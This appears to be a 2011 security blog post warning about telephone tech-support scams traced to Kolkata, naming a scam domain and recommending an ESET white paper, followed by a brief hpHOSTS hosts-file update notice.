Others and I have been reporting on and following the telephony-based scams, which for now are being traced back to "companies" in Kolkata, India, for quite some time.

I'm sorry to say (but definitely not surprised), these scammers are still targeting people around the world, with reports coming in quite frequently to places such as digitaltoast.co.uk (warning, due to the page size, it may freeze your browser whilst it loads), with the last one as little as two hours ago, from someone in Canada.

Sadly, not many seem to be mentioning the sites they were pointed to, but the latest one that was mentioned was techesupport.co.cc, hosted by USA-based HostNOC at IP 184.82.73.38. Surprised to see .co.cc being used? Nope, neither am I. Along with dot.tk, cz.cc etc., .co.cc is a favourite amongst the criminal crowd as it's free.

The primary way to try and put a stop to this, other than actually arresting the criminals (I'm still wondering why LE in India haven't put a stop to it themselves??), is to warn as many people as possible - your family, friends, friends of friends, work colleagues ... you get the picture. On this note, my good friend over at Eset, David Harley, has written a paper (and thank you for the mention David!) you can print out and give them, that contains a lot of information on these scams, and of course, what to look out for so you can avoid them.

Where’s your IT support desk when you need it?
http://blog.eset.com/2011/03/03/wheres-your-it-support-desk-when-you-need-it

The paper itself can be found at the following, listed under "Eset white papers";

http://www.eset.com/us/documentation/white-papers

Title: Hanging on the Telephone
Authors: David Harley, Urban Schrott and Jan Zeleznak, February 2011
Short description: As if fake anti-virus products weren’t bad enough, nowadays we have unsolicited phone-calls from fake AV helpdesks. ESET researchers tell you more about support scams.

Download the paper, give it a good read, and make sure you pass a copy on to friends, relatives, colleagues, and anyone else you can think of. Have a word with your local media and see if they'll publicize it too.

References

Support Scams: Even More Personal
http://blog.eset.com/2010/12/16/support-scams-even-more-personal

Fake Support: the War Drags On
http://blog.eset.com/2010/11/18/fake-support-the-war-drags-on

Marketing Misusing ESET’s Name
http://blog.eset.com/2010/06/23/marketing-misusing-esets-name

techonsupport.com, click4rescue.com, pcrescueworld.com: SupportOnClick revisited
http://hphosts.blogspot.com/2009/12/techonsupportcom-click4rescuecom.html

SupportOnClick: Phoned by Malwarebytes? BigPond? Anyone else?

http://hphosts.blogspot.com/2009/07/supportonclick-phoned-by-malwarebytes.html

SupportOnClick Update
http://hphosts.blogspot.com/2009/04/supportonclick-update.html

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

Fake tech support call scam - prefetch virus logmein123.com
http://www.digitaltoast.co.uk/fake-tech-support-call-scam-prefetch-virus-logmein123com

New scam - They call you by phone!
http://www.malwarebytes.org/forums/index.php?showtopic=11156

Staffordshire Council - Telephone computer support warning (PDF)
http://www.staffordshire.gov.uk/NR/rdonlyres/6997DBB0-E31E-4AFB-A886-C9DDEE114204/90090/TelephoneComputerSupportWarning.pdf

Cold call scam warns of virus infection
http://www.h-online.com/security/Cold-call-scam-warns-of-virus-infection--/news/112893

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

Tuesday 1 March 2011

hpHOSTS: Updated March 2011

hpHOSTS - Updated March 2011

The hpHOSTS Hosts file has been updated. There is now a total of 122,276 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Last Updated: 02/03/2011 00:00
  2. Last Verified: 01/03/2011 16:00
Download hpHosts now!
http://hosts-file.net/?s=Download